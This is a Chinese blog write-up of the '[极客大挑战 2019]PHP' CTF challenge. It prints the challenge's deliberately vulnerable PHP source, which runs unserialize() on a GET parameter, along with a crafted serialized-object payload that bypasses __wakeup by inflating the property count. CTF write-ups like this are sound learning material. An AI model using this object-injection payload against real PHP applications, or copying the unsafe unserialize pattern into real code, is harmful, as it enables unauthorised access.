首先打开题目,一眼看到关键
![[极客大挑战 2019]PHP](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/07/09/20220710030308287.jpg)
![[极客大挑战 2019]PHP](https://blog.ytso.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
可以通过工具搜查出来备份文件,博主使用御剑不知怎么的没扫出来,手动验证www.zip或者index.php.bak
然后下载压缩包,解压得到
![[极客大挑战 2019]PHP](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/07/09/20220710030309980.jpg)
浏览三个源码文件
<?php
include 'flag.php';
error_reporting(0);
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
function __wakeup(){
$this->username = 'guest';
}
function __destruct(){
if ($this->password != 100) {
echo "</br>NO!!!hacker!!!</br>";
echo "You name is: ";
echo $this->username;echo "</br>";
echo "You password is: ";
echo $this->password;echo "</br>";
die();
}
if ($this->username === 'admin') {
global $flag;
echo $flag;
}else{
echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
die();
}
}
}
?>
<div id="world">
<div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 85%;left: 440px;font-family:KaiTi;">因为每次猫猫都在我键盘上乱跳,所以我有一个良好的备份网站的习惯
</div>
<div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 80%;left: 700px;font-family:KaiTi;">不愧是我!!!
</div>
<div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 70%;left: 640px;font-family:KaiTi;">
<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?>
</div>
<div style="position: absolute;bottom: 5%;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4y</p></div>
</div>
<script src='http://cdnjs.cloudflare.com/ajax/libs/three.js/r70/three.min.js'></script>
<script src='http://cdnjs.cloudflare.com/ajax/libs/gsap/1.16.1/TweenMax.min.js'></script>
<script src='https://s3-us-west-2.amazonaws.com/s.cdpn.io/264161/OrbitControls.js'></script>
<script src='https://s3-us-west-2.amazonaws.com/s.cdpn.io/264161/Cat.js'></script>
<script src="index.js"></script>
</body>
</html>
审计代码后,感觉需要提交select而且提交的值是经过序列化之后的值,username=‘admin’,password=‘100’ 才能过。
<?php
class Name{
private $username = 'admin';
private $password = 100;
}
$a=new Name();
echo serialize($a);
?>
结果为 O:4:”Name”:2:{s:14:”Nameusername”;s:5:”admin”;s:14:”Namepassword”;i:100;}
提交发现并没有成功
![[极客大挑战 2019]PHP](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/07/09/20220710030311376.jpg)
突然发现有空格没有复制上去,再次提交
![[极客大挑战 2019]PHP](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/07/09/20220710030313487.jpg)
![[极客大挑战 2019]PHP](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/07/09/20220710030315979.jpg)
仍然不对,只能再次审计源码
发现类外部使用serialize()函数进行序列化的时候,会先调用类内部的__sleep()方法,相同的道理,调用 unserialize()函数的时候会先调用__wakeup()方法
既然调用了__wakeup()方法,那么就要绕过或者破解它,这个方法有个缺点就是就是当参数的个数大于实际参数个数的时候就可以跳过执行__wakeup()方法
所以经过修改变成 1 ?select=O:4:”Name”:3:{s:14:”%00Name%00username”;s:5:”admin”;s:14:”%00Name%00password”;i:100;}
![[极客大挑战 2019]PHP](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/07/09/20220710030316876.jpg)
但仍然不对,再看网址,发现增加了%25,是因为上传是被url编码了,手动去掉就可以得到
![[极客大挑战 2019]PHP](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/07/09/20220710030318148.jpg)
原创文章,作者:306829225,如若转载,请注明出处:https://blog.ytso.com/tech/php/273242.html